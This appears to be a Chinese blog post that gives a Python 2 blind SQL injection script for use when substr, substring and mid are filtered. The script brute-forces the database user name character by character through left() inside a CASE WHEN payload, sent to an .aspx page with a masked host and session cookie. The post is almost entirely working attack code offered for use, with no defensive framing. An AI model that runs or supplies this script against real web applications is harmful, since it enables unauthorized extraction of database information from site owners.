禁用substr、substring、mid函数的sql注入脚本

2022-11-01 21:36:43

#encodeing=utf-8

import requests

import sys

reload(sys)

sys.setdefaultencoding('utf-8')

payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

headers = {

    'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'*****************************************'

    }

print "test..."

user=""

for i in range(1,7):

    for payload in payloads:

        user+=payload

        aaa="--"

        d="(case when (left(user,%s))='%s' then 1 else 0 end)" % (i,user)

        test = d + aaa

        r=requests.get('http://**********/******.aspx?ID=203263/'+test,headers=headers)

        if r.status_code==200:

            print user

            break

        else:

            user=user[:-1]

  

上一篇:关于Android开发的几点建议


下一篇:ng-if 和 ng-show/ng-hide 之间的区别